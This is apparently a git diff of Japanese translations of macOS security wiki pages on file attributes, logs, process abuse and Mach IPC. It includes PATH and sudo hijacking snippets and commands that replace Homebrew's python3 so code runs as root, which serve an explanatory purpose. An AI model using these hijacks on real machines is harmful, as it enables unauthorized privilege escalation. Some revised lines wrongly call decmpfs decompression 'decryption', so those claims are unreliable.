`com.apple.uuidb.boot-uuid`: ユニークUUIDを持つブートエポックのlogdマーク +- `com.apple.uuidb.boot-uuid`: 一意のUUIDを持つブートエポックのlogdマーク - `com.apple.decmpfs`: MacOS: 透過的ファイル圧縮 (II/7) - `com.apple.cprotect`: \*OS: ファイルごとの暗号化データ (III/11) - `com.apple.installd.*`: \*OS: installdによって使用されるメタデータ(例:`installType`、`uniqueInstallID`) ### リソースフォーク | macOS ADS -これは**MacOSにおける代替データストリーム**を取得する方法です。**file/..namedfork/rsrc**内の拡張属性**com.apple.ResourceFork**にコンテンツを保存することができます。 +これは**MacOS**マシンで**代替データストリーム**を取得する方法です。**file/..namedfork/rsrc**内の拡張属性**com.apple.ResourceFork**にコンテンツを保存することができます。 ```bash echo "Hello" > a.txt echo "Hello Mac ADS" > a.txt/..namedfork/rsrc @@ -213,23 +213,23 @@ find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf ``` ### decmpfs -拡張属性 `com.apple.decmpfs` は、ファイルが暗号化されて保存されていることを示します。`ls -l` は **サイズが0** であると報告し、圧縮データはこの属性内にあります。ファイルにアクセスされるたびに、メモリ内で復号化されます。 +拡張属性 `com.apple.decmpfs` は、ファイルが暗号化されて保存されていることを示します。`ls -l` は **サイズが 0** であると報告し、圧縮データはこの属性内にあります。ファイルにアクセスされるたびに、メモリ内で復号化されます。 -この属性は `ls -lO` で確認でき、圧縮されたファイルはフラグ `UF_COMPRESSED` でタグ付けされているため、圧縮されていることが示されます。圧縮ファイルが `chflags nocompressed ` で削除されると、システムはそのファイルが圧縮されていたことを認識せず、したがってデータを解凍してアクセスすることができません(実際には空であると考えます)。 +この属性は `ls -lO` で確認でき、圧縮されたファイルはフラグ `UF_COMPRESSED` でタグ付けされているため、圧縮されていることが示されます。圧縮ファイルが `chflags nocompressed ` で削除されると、システムはそのファイルが圧縮されていたことを認識せず、したがってデータを復号化してアクセスすることができません(実際には空であると考えます)。 -ツール afscexpand を使用して、ファイルを強制的に解凍することができます。 +ツール afscexpand を使用して、ファイルを強制的に復号化することができます。 -## **ユニバーサルバイナリ &** Mach-oフォーマット +## **ユニバーサルバイナリ &** Mach-o フォーマット -Mac OSのバイナリは通常、**ユニバーサルバイナリ**としてコンパイルされます。**ユニバーサルバイナリ**は、**同じファイル内で複数のアーキテクチャをサポートすることができます**。 +Mac OS のバイナリは通常 **ユニバーサルバイナリ** としてコンパイルされます。**ユニバーサルバイナリ** は **同じファイル内で複数のアーキテクチャをサポート** できます。 {{#ref}} universal-binaries-and-mach-o-format.md {{#endref}} -## macOSプロセスメモリ +## macOS プロセスメモリ -## macOSメモリダンプ +## macOS メモリダンプ {{#ref}} macos-memory-dumping.md @@ -237,21 +237,21 @@ macos-memory-dumping.md ## リスクカテゴリファイル Mac OS -ディレクトリ `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` には、**異なるファイル拡張子に関連するリスクに関する情報が保存されています**。このディレクトリは、ファイルをさまざまなリスクレベルに分類し、Safariがこれらのファイルをダウンロード時にどのように扱うかに影響を与えます。カテゴリは次のとおりです: +ディレクトリ `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` には、**異なるファイル拡張子に関連するリスクに関する情報が保存されています**。このディレクトリはファイルをさまざまなリスクレベルに分類し、Safari がこれらのファイルをダウンロード時にどのように扱うかに影響を与えます。カテゴリは次のとおりです: -- **LSRiskCategorySafe**: このカテゴリのファイルは **完全に安全** と見なされます。Safariはこれらのファイルをダウンロード後に自動的に開きます。 -- **LSRiskCategoryNeutral**: これらのファイルには警告がなく、Safariによって **自動的に開かれません**。 -- **LSRiskCategoryUnsafeExecutable**: このカテゴリのファイルは **警告を引き起こします**。これは、そのファイルがアプリケーションであることを示すセキュリティ対策です。 -- **LSRiskCategoryMayContainUnsafeExecutable**: このカテゴリは、実行可能ファイルを含む可能性のあるアーカイブなどのファイルに適用されます。Safariは、すべての内容が安全または中立であることを確認できない限り、**警告を引き起こします**。 +- **LSRiskCategorySafe**: このカテゴリのファイルは **完全に安全** と見なされます。Safari はこれらのファイルをダウンロード後に自動的に開きます。 +- **LSRiskCategoryNeutral**: これらのファイルには警告がなく、Safari によって **自動的に開かれません**。 +- **LSRiskCategoryUnsafeExecutable**: このカテゴリのファイルは **警告を引き起こします**。これはファイルがアプリケーションであることを示すセキュリティ対策です。 +- **LSRiskCategoryMayContainUnsafeExecutable**: このカテゴリは、実行可能ファイルを含む可能性のあるアーカイブなどのファイル用です。Safari は、すべての内容が安全または中立であることを確認できない限り、**警告を引き起こします**。 ## ログファイル - **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: ダウンロードされたファイルに関する情報を含み、どこからダウンロードされたかのURLが含まれています。 -- **`/var/log/system.log`**: OSXシステムのメインログ。com.apple.syslogd.plistはsysloggingの実行を担当しています(`launchctl list`で "com.apple.syslogd" を探すことで無効になっているか確認できます)。 -- **`/private/var/log/asl/*.asl`**: これらはAppleシステムログで、興味深い情報が含まれている可能性があります。 -- **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: "Finder"を通じて最近アクセスされたファイルとアプリケーションを保存します。 +- **`/var/log/system.log`**: OSX システムのメインログ。com.apple.syslogd.plist は syslogging の実行を担当しています(`launchctl list` で "com.apple.syslogd" を探すことで無効になっているか確認できます)。 +- **`/private/var/log/asl/*.asl`**: これらは Apple システムログで、興味深い情報が含まれている可能性があります。 +- **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: "Finder" を通じて最近アクセスされたファイルとアプリケーションを保存します。 - **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: システム起動時に起動するアイテムを保存します。 -- **`$HOME/Library/Logs/DiskUtility.log`**: DiskUtilityアプリのログファイル(ドライブに関する情報、USBを含む)。 +- **`$HOME/Library/Logs/DiskUtility.log`**: DiskUtility アプリのログファイル(ドライブに関する情報、USBを含む)。 - **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: ワイヤレスアクセスポイントに関するデータ。 - **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: 無効化されたデーモンのリスト。 diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md index 95ca43816..eadd9e563 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md @@ -4,7 +4,8 @@ ## TCC 特権昇格 -TCC 特権昇格を探している場合は、次に進んでください: +TCC 特権昇格を探している場合は、次に進んでください: + {{#ref}} macos-security-protections/macos-tcc/ @@ -12,7 +13,8 @@ macos-security-protections/macos-tcc/ ## Linux Privesc -**特権昇格に関するほとんどのトリックは、Linux/Unix に影響を与えるものは MacOS にも影響を与えることに注意してください。** したがって、次を参照してください: +**特権昇格に関するほとんどのトリックは、Linux/Unix に影響を与えるものは MacOS にも影響を与えることに注意してください。** したがって、次を参照してください: + {{#ref}} ../../linux-hardening/privilege-escalation/ @@ -24,7 +26,7 @@ macos-security-protections/macos-tcc/ 元の [Sudo ハイジャック技術は Linux 特権昇格の投稿内にあります](../../linux-hardening/privilege-escalation/index.html#sudo-hijacking)。 -しかし、macOS は **`sudo`** を実行する際にユーザーの **`PATH`** を **保持** します。つまり、この攻撃を達成する別の方法は、被害者が **sudo を実行する際に** 実行する他のバイナリを **ハイジャックする** ことです: +しかし、macOS は **`sudo`** を実行する際にユーザーの **`PATH`** を **保持** します。つまり、この攻撃を達成する別の方法は、被害者が **sudo を実行する際に実行する他のバイナリをハイジャックする** ことです: ```bash # Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH cat > /opt/homebrew/bin/ls < [!TIP] > これらのオブジェクトの最後の4バイトはオーバーフローを検出するために使用されます。 ### スレッドローカル変数 (TLV) -**スレッドローカル変数 (TLV)** は、Mach-Oファイル(macOSの実行可能ファイルの形式)の文脈で、マルチスレッドアプリケーション内の**各スレッド**に特有の変数を宣言するために使用されます。これにより、各スレッドが変数の独自のインスタンスを持ち、ミューテックスのような明示的な同期メカニズムを必要とせずに競合を回避し、データの整合性を維持する方法が提供されます。 +**スレッドローカル変数 (TLV)** は、Mach-Oファイル(macOSの実行可能ファイルの形式)の文脈で、マルチスレッドアプリケーション内の**各スレッド**に特有の変数を宣言するために使用されます。これにより、各スレッドが変数の独自のインスタンスを持ち、ミューテックスのような明示的な同期メカニズムを必要とせずに競合を避け、データの整合性を維持する方法が提供されます。 Cおよび関連言語では、**`__thread`**キーワードを使用してスレッドローカル変数を宣言できます。以下は、あなたの例での動作方法です: ```c @@ -100,36 +100,36 @@ void main (int argc, char **argv){ tlv_var = 10; } ``` -このスニペットは `tlv_var` をスレッドローカル変数として定義しています。このコードを実行している各スレッドは独自の `tlv_var` を持ち、あるスレッドが `tlv_var` に加えた変更は他のスレッドの `tlv_var` に影響を与えません。 +このスニペットは `tlv_var` をスレッドローカル変数として定義します。このコードを実行している各スレッドは独自の `tlv_var` を持ち、あるスレッドが `tlv_var` に加えた変更は他のスレッドの `tlv_var` に影響を与えません。 Mach-O バイナリでは、スレッドローカル変数に関連するデータが特定のセクションに整理されています: - **`__DATA.__thread_vars`**: このセクションには、スレッドローカル変数に関するメタデータが含まれており、変数の型や初期化状態などが記載されています。 -- **`__DATA.__thread_bss`**: このセクションは、明示的に初期化されていないスレッドローカル変数に使用されます。ゼロ初期化されたデータのために確保されたメモリの一部です。 +- **`__DATA.__thread_bss`**: このセクションは、明示的に初期化されていないスレッドローカル変数に使用されます。ゼロ初期化データのために確保されたメモリの一部です。 -Mach-O は、スレッドが終了する際にスレッドローカル変数を管理するための特定の API **`tlv_atexit`** も提供しています。この API を使用すると、スレッドが終了する際にスレッドローカルデータをクリーンアップする特別な関数である **デストラクタ** を **登録** できます。 +Mach-O は、スレッドが終了する際にスレッドローカル変数を管理するための特定の API **`tlv_atexit`** も提供します。この API を使用すると、スレッドが終了する際にスレッドローカルデータをクリーンアップする特別な関数である **デストラクタ** を登録できます。 -### スレッドの優先度 +### スレッドの優先順位 -スレッドの優先度を理解するには、オペレーティングシステムがどのスレッドをいつ実行するかを決定する方法を見ていく必要があります。この決定は、各スレッドに割り当てられた優先度レベルによって影響を受けます。macOS および Unix 系システムでは、これを `nice`、`renice`、および Quality of Service (QoS) クラスのような概念を使用して処理します。 +スレッドの優先順位を理解するには、オペレーティングシステムがどのスレッドをいつ実行するかを決定する方法を見ていく必要があります。この決定は、各スレッドに割り当てられた優先度レベルによって影響を受けます。macOS および Unix 系のシステムでは、`nice`、`renice`、および Quality of Service (QoS) クラスのような概念を使用してこれを処理します。 #### Nice と Renice 1. **Nice:** - プロセスの `nice` 値は、その優先度に影響を与える数値です。すべてのプロセスには -20(最高優先度)から 19(最低優先度)までの範囲の nice 値があります。プロセスが作成されるときのデフォルトの nice 値は通常 0 です。 -- より低い nice 値(-20 に近い)は、プロセスをより「自己中心的」にし、他のプロセスよりも多くの CPU 時間を与えます。 +- より低い nice 値(-20 に近い)は、プロセスをより「自己中心的」にし、より高い nice 値を持つ他のプロセスと比較して、より多くの CPU 時間を与えます。 2. **Renice:** -- `renice` は、すでに実行中のプロセスの nice 値を変更するために使用されるコマンドです。これを使用して、プロセスの優先度を動的に調整し、新しい nice 値に基づいて CPU 時間の割り当てを増減できます。 +- `renice` は、すでに実行中のプロセスの nice 値を変更するために使用されるコマンドです。これを使用して、プロセスの優先度を動的に調整し、新しい nice 値に基づいて CPU 時間の割り当てを増減させることができます。 - たとえば、プロセスが一時的により多くの CPU リソースを必要とする場合、`renice` を使用してその nice 値を下げることができます。 #### Quality of Service (QoS) クラス -QoS クラスは、特に **Grand Central Dispatch (GCD)** をサポートする macOS のようなシステムでスレッドの優先度を処理するためのより現代的なアプローチです。QoS クラスを使用すると、開発者は作業をその重要性や緊急性に基づいて異なるレベルに **分類** できます。macOS はこれらの QoS クラスに基づいてスレッドの優先度を自動的に管理します: +QoS クラスは、特に **Grand Central Dispatch (GCD)** をサポートする macOS のようなシステムでスレッドの優先順位を処理するためのより現代的なアプローチです。QoS クラスを使用すると、開発者は作業をその重要性や緊急性に基づいて異なるレベルに **分類** できます。macOS はこれらの QoS クラスに基づいてスレッドの優先順位を自動的に管理します: 1. **ユーザーインタラクティブ:** -- このクラスは、現在ユーザーと対話しているタスクや、良好なユーザーエクスペリエンスを提供するために即時の結果を必要とするタスクに使用されます。これらのタスクは、インターフェースを応答性のあるものに保つために最高の優先度が与えられます(例:アニメーションやイベント処理)。 +- このクラスは、現在ユーザーと対話しているタスクや、良好なユーザーエクスペリエンスを提供するために即時の結果を必要とするタスクに使用されます。これらのタスクには、インターフェースを応答させるために最高の優先度が与えられます(例:アニメーションやイベント処理)。 2. **ユーザー開始:** -- ユーザーが開始し、即時の結果を期待するタスク(例:ドキュメントを開く、計算を必要とするボタンをクリックするなど)。これらは高優先度ですが、ユーザーインタラクティブよりは低いです。 +- ユーザーが開始し、即時の結果を期待するタスク(例:ドキュメントを開く、計算を必要とするボタンをクリックする)です。これらは高優先度ですが、ユーザーインタラクティブの下に位置します。 3. **ユーティリティ:** - これらのタスクは長時間実行され、通常は進行状況インジケーターを表示します(例:ファイルのダウンロード、データのインポート)。これらはユーザー開始タスクよりも優先度が低く、即座に完了する必要はありません。 4. **バックグラウンド:** @@ -137,7 +137,7 @@ QoS クラスは、特に **Grand Central Dispatch (GCD)** をサポートする QoS クラスを使用することで、開発者は正確な優先度番号を管理する必要がなく、タスクの性質に焦点を当てることができ、システムはそれに応じて CPU リソースを最適化します。 -さらに、スレッドスケジューリングポリシーが異なり、スケジューラが考慮する一連のスケジューリングパラメータを指定することができます。これは `thread_policy_[set/get]` を使用して行うことができます。これはレースコンディション攻撃に役立つかもしれません。 +さらに、スレッドスケジューリングポリシーの異なる **スレッドスケジューリングポリシー** があり、スケジューラが考慮する一連のスケジューリングパラメータを指定します。これは `thread_policy_[set/get]` を使用して行うことができます。これはレースコンディション攻撃に役立つかもしれません。 ## MacOS プロセスの悪用 @@ -145,15 +145,15 @@ MacOS は、他のオペレーティングシステムと同様に、**プロセ ### ライブラリインジェクション -ライブラリインジェクションは、攻撃者が **プロセスに悪意のあるライブラリをロードさせる** 技術です。一度注入されると、ライブラリはターゲットプロセスのコンテキストで実行され、攻撃者はプロセスと同じ権限とアクセスを得ることができます。 +ライブラリインジェクションは、攻撃者が **プロセスに悪意のあるライブラリをロードさせる** 技術です。一度注入されると、ライブラリはターゲットプロセスのコンテキストで実行され、攻撃者にプロセスと同じ権限とアクセスを提供します。 {{#ref}} macos-library-injection/ {{#endref}} -### 関数フッキング +### 関数フック -関数フッキングは、ソフトウェアコード内の **関数呼び出し** やメッセージを **傍受する** ことを含みます。関数をフックすることで、攻撃者はプロセスの **動作を変更** したり、機密データを観察したり、実行フローを制御したりすることができます。 +関数フックは、ソフトウェアコード内の **関数呼び出し** またはメッセージを **傍受する** ことを含みます。関数をフックすることで、攻撃者はプロセスの **動作を変更** したり、機密データを観察したり、実行フローを制御したりすることができます。 {{#ref}} macos-function-hooking.md @@ -161,7 +161,7 @@ macos-function-hooking.md ### プロセス間通信 -プロセス間通信 (IPC) は、別々のプロセスが **データを共有し、交換する** 方法を指します。IPC は多くの正当なアプリケーションにとって基本的ですが、プロセスの隔離を破ったり、機密情報を漏洩させたり、無許可のアクションを実行するために悪用される可能性もあります。 +プロセス間通信 (IPC) は、別々のプロセスが **データを共有し、交換する** 方法を指します。IPC は多くの正当なアプリケーションにとって基本的ですが、プロセスの隔離を覆したり、機密情報を漏洩させたり、無許可のアクションを実行するために悪用される可能性もあります。 {{#ref}} macos-ipc-inter-process-communication/ @@ -185,7 +185,7 @@ macos-chromium-injection.md ### ダーティ NIB -NIB ファイルは **ユーザーインターフェース (UI) 要素** とその相互作用をアプリケーション内で定義します。しかし、これらは **任意のコマンドを実行する** ことができ、**Gatekeeper はすでに実行されたアプリケーションが **NIB ファイルが変更されても** 実行されるのを止めません**。したがって、これらは任意のプログラムが任意のコマンドを実行するために使用される可能性があります: +NIB ファイルは **ユーザーインターフェース (UI) 要素** とそのアプリケーション内での相互作用を **定義します**。ただし、これらは **任意のコマンドを実行することができ**、**NIB ファイルが変更されても** すでに実行されたアプリケーションの実行を止めることはできません。したがって、任意のプログラムが任意のコマンドを実行するために使用される可能性があります: {{#ref}} macos-dirty-nib.md @@ -193,7 +193,7 @@ macos-dirty-nib.md ### Java アプリケーションのインジェクション -特定の Java 機能(**`_JAVA_OPTS`** 環境変数など)を悪用して、Java アプリケーションが **任意のコード/コマンドを実行する** ことが可能です。 +特定の Java 機能(**`_JAVA_OPTS`** 環境変数など)を悪用して、Java アプリケーションが **任意のコード/コマンドを実行する** ようにすることが可能です。 {{#ref}} macos-java-apps-injection.md @@ -201,7 +201,7 @@ macos-java-apps-injection.md ### .Net アプリケーションのインジェクション -**.Net デバッグ機能** を悪用して、.Net アプリケーションにコードを注入することが可能です(macOS の保護(ランタイムハードニングなど)によって保護されていません)。 +**.Net デバッグ機能** を悪用して .Net アプリケーションにコードを注入することが可能です(macOS の保護(ランタイムハードニングなど)によって保護されていません)。 {{#ref}} macos-.net-applications-injection.md @@ -209,7 +209,7 @@ macos-.net-applications-injection.md ### Perl インジェクション -Perl スクリプトが任意のコードを実行するためのさまざまなオプションを確認してください: +Perl スクリプトが任意のコードを実行するためのさまざまなオプションを確認します: {{#ref}} macos-perl-applications-injection.md @@ -234,7 +234,7 @@ macos-ruby-applications-injection.md > [!CAUTION] > 全体として、環境変数を悪用して Python が任意のコードを実行する方法を見つけることができませんでした。\ -> ただし、ほとんどの人は **Hombrew** を使用して Python をインストールし、デフォルトの管理者ユーザーのために **書き込み可能な場所** に Python をインストールします。次のようにハイジャックできます: +> ただし、ほとんどの人は **Homebrew** を使用して Python をインストールし、デフォルトの管理者ユーザーのために **書き込み可能な場所** に Python をインストールします。次のようにハイジャックできます: > > ```bash > mv /opt/homebrew/bin/python3 /opt/homebrew/bin/python3.old @@ -246,24 +246,24 @@ macos-ruby-applications-injection.md > chmod +x /opt/homebrew/bin/python3 > ``` > -> これにより、**root** も Python を実行する際にこのコードを実行します。 +> これにより、**root** でも Python を実行する際にこのコードが実行されます。 ## 検出 ### Shield -[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) は、**プロセスインジェクション** アクションを **検出し、ブロックする** ことができるオープンソースアプリケーションです: +[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) は、**プロセスインジェクション** アクションを **検出およびブロック** できるオープンソースアプリケーションです: - **環境変数を使用**: 次の環境変数のいずれかの存在を監視します: **`DYLD_INSERT_LIBRARIES`**、**`CFNETWORK_LIBRARY_PATH`**、**`RAWCAMERA_BUNDLE_PATH`** および **`ELECTRON_RUN_AS_NODE`** - **`task_for_pid`** 呼び出しを使用: あるプロセスが他のプロセスの **タスクポートを取得しようとする** 時を見つけるために使用され、これによりプロセスにコードを注入できます。 -- **Electron アプリのパラメータ**: 誰かが **`--inspect`**、**`--inspect-brk`** および **`--remote-debugging-port`** コマンドライン引数を使用して Electron アプリをデバッグモードで起動し、コードを注入することができます。 -- **シンボリックリンク** または **ハードリンク** を使用: 一般的な悪用は、**ユーザー権限でリンクを配置し、より高い権限の場所を指す** ことです。リンクを作成するプロセスがターゲットファイルとは **異なる権限レベル** を持っている場合、**アラート** を作成します。残念ながら、シンボリックリンクの場合、作成前にリンクの宛先に関する情報がないため、ブロックは不可能です。これは Apple の EndpointSecuriy フレームワークの制限です。 +- **Electron アプリのパラメータ**: 誰かが **`--inspect`**、**`--inspect-brk`** および **`--remote-debugging-port`** コマンドライン引数を使用して、デバッグモードで Electron アプリを起動し、コードを注入することができます。 +- **シンボリックリンク** または **ハードリンク** を使用: 一般的な悪用は、**ユーザー権限でリンクを作成し**、**より高い権限の** 場所を指すことです。リンクを作成するプロセスがターゲットファイルとは **異なる権限レベル** を持っている場合、**アラート** を作成します。残念ながら、シンボリックリンクの場合は、作成前にリンクの宛先に関する情報がないため、ブロックは不可能です。これは Apple の EndpointSecurity フレームワークの制限です。 ### 他のプロセスによって行われた呼び出し -[**このブログ記事**](https://knight.sc/reverse%20engineering/2019/04/15/detecting-task-modifications.html) では、関数 **`task_name_for_pid`** を使用して、他の **プロセスがプロセスにコードを注入している** 情報を取得し、その他のプロセスに関する情報を取得する方法を見つけることができます。 +[**このブログ記事**](https://knight.sc/reverse%20engineering/2019/04/15/detecting-task-modifications.html) では、**`task_name_for_pid`** 関数を使用して、他の **プロセスがプロセスにコードを注入している** 情報を取得し、その他のプロセスに関する情報を取得する方法を見つけることができます。 -この関数を呼び出すには、プロセスを実行しているのと **同じ uid** であるか、**root** である必要があります(この関数はプロセスに関する情報を返し、コードを注入する方法を返すわけではありません)。 +この関数を呼び出すには、**プロセスを実行しているのと同じ uid** であるか、**root** である必要があります(この関数はプロセスに関する情報を返し、コードを注入する方法を返すわけではありません)。 ## 参考文献 diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md index fffd199ab..7473de08c 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md @@ -6,7 +6,7 @@ ### 基本情報 -Machはリソースを共有するための**最小単位**として**タスク**を使用し、各タスクは**複数のスレッド**を含むことができます。これらの**タスクとスレッドはPOSIXプロセスとスレッドに1:1でマッピングされます**。 +Machはリソースを共有するための**最小単位**として**タスク**を使用し、各タスクは**複数のスレッド**を含むことができます。これらの**タスクとスレッドはPOSIXプロセスとスレッドに1:1でマッピングされています**。 タスク間の通信はMach Inter-Process Communication (IPC)を介して行われ、一方向の通信チャネルを利用します。**メッセージはポート間で転送され**、これらはカーネルによって管理される**メッセージキュー**のようなものです。 @@ -14,7 +14,7 @@ Machはリソースを共有するための**最小単位**として**タスク* 各プロセスには**IPCテーブル**があり、そこには**プロセスのmachポート**が見つかります。machポートの名前は実際には番号(カーネルオブジェクトへのポインタ)です。 -プロセスは、いくつかの権利を持つポート名を**別のタスクに送信することもでき**、カーネルはこのエントリを**他のタスクのIPCテーブル**に表示させます。 +プロセスは、**異なるタスク**に権利を持つポート名を送信することもでき、カーネルはこのエントリを**他のタスクのIPCテーブル**に表示させます。 ### ポート権限 @@ -25,13 +25,13 @@ Machはリソースを共有するための**最小単位**として**タスク* - 受信権限の所有者が**死亡**するか、それを殺すと、**送信権限は無効になります(デッドネーム)。** - **送信権限**は、ポートにメッセージを送信することを許可します。 - 送信権限は**クローン**可能で、送信権限を持つタスクはその権限をクローンし、**第三のタスクに付与**できます。 -- **ポート権限**はMacメッセージを介しても**渡すことができます**。 +- **ポート権限**はMacメッセージを介して**渡すこともできます**。 - **一度だけの送信権限**は、ポートに1つのメッセージを送信し、その後消失します。 -- この権限は**クローンできません**が、**移動することができます**。 +- この権限は**クローンできません**が、**移動することはできます**。 - **ポートセット権限**は、単一のポートではなく、_ポートセット_を示します。ポートセットからメッセージをデキューすると、その中の1つのポートからメッセージがデキューされます。ポートセットは、Unixの`select`/`poll`/`epoll`/`kqueue`のように、複数のポートを同時にリッスンするために使用できます。 - **デッドネーム**は実際のポート権限ではなく、単なるプレースホルダーです。ポートが破棄されると、そのポートに対するすべての既存のポート権限はデッドネームに変わります。 -**タスクは他のタスクにSEND権限を転送でき**、それによりメッセージを返送することが可能になります。**SEND権限もクローン可能で、タスクはその権限を複製して第三のタスクに与えることができます**。これにより、**ブートストラップサーバー**と呼ばれる仲介プロセスを組み合わせることで、タスク間の効果的な通信が可能になります。 +**タスクは他のタスクにSEND権限を転送**でき、メッセージを返送することが可能になります。**SEND権限もクローン可能で、タスクはその権限を複製して第三のタスクに与えることができます**。これにより、**ブートストラップサーバー**と呼ばれる仲介プロセスを組み合わせることで、タスク間の効果的な通信が可能になります。 ### ファイルポート @@ -41,9 +41,9 @@ Machはリソースを共有するための**最小単位**として**タスク* 前述のように、Machメッセージを使用して権限を送信することは可能ですが、**Machメッセージを送信する権限を持っていないと権限を送信することはできません**。では、最初の通信はどのように確立されるのでしょうか? -これには、**ブートストラップサーバー**(macでは**launchd**)が関与します。**誰でもブートストラップサーバーにSEND権限を取得できるため**、他のプロセスにメッセージを送信する権限を要求することが可能です: +これには、**ブートストラップサーバー**(macの**launchd**)が関与します。**誰でもブートストラップサーバーにSEND権限を取得できるため**、他のプロセスにメッセージを送信する権限を要求することが可能です: -1. タスク**A**が**新しいポート**を作成し、そのポートに対して**受信権限**を取得します。 +1. タスク**A**が**新しいポート**を作成し、そのポートに対する**受信権限**を取得します。 2. タスク**A**は、受信権限の保持者として、**ポートのための送信権限を生成**します。 3. タスク**A**は**ブートストラップサーバー**との**接続**を確立し、最初に生成したポートのための**送信権限を送信**します。 - 誰でもブートストラップサーバーにSEND権限を取得できることを忘れないでください。 @@ -53,15 +53,15 @@ Machはリソースを共有するための**最小単位**として**タスク* 6. このSEND権限を持って、**タスクB**は**タスクAにメッセージを送信**することができます。 7. 双方向通信のために、通常タスク**B**は**受信**権限と**送信**権限を持つ新しいポートを生成し、**タスクAにSEND権限を与えて、タスクBにメッセージを送信できるようにします**(双方向通信)。 -ブートストラップサーバーは、タスクが主張するサービス名を**認証することはできません**。これは、**タスク**が任意のシステムタスクを**偽装する可能性がある**ことを意味し、例えば、偽の**認証サービス名を主張し、すべてのリクエストを承認する**ことができます。 +ブートストラップサーバーは、タスクが主張するサービス名を**認証することはできません**。これは、**タスク**が任意のシステムタスクを**偽装する可能性がある**ことを意味し、誤って**認証サービス名を主張し、すべてのリクエストを承認する**ことができます。 -その後、Appleは**システム提供サービスの名前**を安全な設定ファイルに保存し、**SIP保護された**ディレクトリに配置します:`/System/Library/LaunchDaemons`および`/System/Library/LaunchAgents`。各サービス名に対して、**関連するバイナリも保存されます**。ブートストラップサーバーは、これらのサービス名の**受信権限を作成し保持します**。 +その後、Appleは**システム提供サービスの名前**を安全な構成ファイルに保存し、**SIP保護された**ディレクトリに配置します:`/System/Library/LaunchDaemons`および`/System/Library/LaunchAgents`。各サービス名に対して、**関連するバイナリも保存されます**。ブートストラップサーバーは、これらのサービス名の**受信権限を作成し保持します**。 これらの事前定義されたサービスに対して、**ルックアッププロセスはわずかに異なります**。サービス名がルックアップされると、launchdはサービスを動的に開始します。新しいワークフローは次のようになります: - タスク**B**がサービス名のブートストラップ**ルックアップ**を開始します。 - **launchd**はタスクが実行中かどうかを確認し、実行されていない場合は**開始**します。 -- タスク**A**(サービス)は**ブートストラップチェックイン**(`bootstrap_check_in()`)を実行します。ここで、**ブートストラップ**サーバーはSEND権限を作成し、それを保持し、**受信権限をタスクAに転送します**。 +- タスク**A**(サービス)は**ブートストラップチェックイン**(`bootstrap_check_in()`)を実行します。ここで、**ブートストラップ**サーバーはSEND権限を作成し、それを保持し、**タスクAに受信権限を転送します**。 - launchdは**SEND権限を複製し、タスクBに送信します**。 - タスク**B**は**受信**権限と**送信**権限を持つ新しいポートを生成し、**タスクA**(svc)にSEND権限を与えて、タスクBにメッセージを送信できるようにします(双方向通信)。 @@ -74,7 +74,7 @@ Machはリソースを共有するための**最小単位**として**タスク* [詳細情報はこちら](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) -`mach_msg`関数は、実質的にシステムコールであり、Machメッセージの送信と受信に使用されます。この関数は、最初の引数として送信されるメッセージを必要とします。このメッセージは、`mach_msg_header_t`構造体で始まり、その後に実際のメッセージ内容が続きます。この構造体は次のように定義されています: +`mach_msg`関数は、基本的にシステムコールであり、Machメッセージの送信と受信に使用されます。この関数は、送信されるメッセージを最初の引数として必要とします。このメッセージは、`mach_msg_header_t`構造体で始まり、その後に実際のメッセージ内容が続きます。この構造体は次のように定義されています: ```c typedef struct { mach_msg_bits_t msgh_bits; @@ -89,13 +89,13 @@ mach_msg_id_t msgh_id; 初期フィールド **`msgh_bits`** はビットマップです: -- 最初のビット(最も重要なビット)は、メッセージが複雑であることを示すために使用されます(詳細は以下)。 -- 3番目と4番目はカーネルによって使用されます。 +- 最初のビット(最も重要なビット)は、メッセージが複雑であることを示すために使用されます(詳細は以下に記載) +- 3番目と4番目はカーネルによって使用されます - 2バイト目の **5つの最下位ビット** は **バウチャー** に使用できます:キー/値の組み合わせを送信するための別のタイプのポートです。 -- 3バイト目の **5つの最下位ビット** は **ローカルポート** に使用できます。 -- 4バイト目の **5つの最下位ビット** は **リモートポート** に使用できます。 +- 3バイト目の **5つの最下位ビット** は **ローカルポート** に使用できます +- 4バイト目の **5つの最下位ビット** は **リモートポート** に使用できます -バウチャー、ローカルポート、リモートポートで指定できるタイプは次の通りです([**mach/message.h**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)から): +バウチャー、ローカルポート、リモートポートで指定できるタイプは次の通りです([**mach/message.h**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html) から): ```c #define MACH_MSG_TYPE_MOVE_RECEIVE 16 /* Must hold receive right */ #define MACH_MSG_TYPE_MOVE_SEND 17 /* Must hold send right(s) */ @@ -108,12 +108,12 @@ mach_msg_id_t msgh_id; #define MACH_MSG_TYPE_DISPOSE_SEND 25 /* must hold send right(s) */ #define MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26 /* must hold sendonce right */ ``` 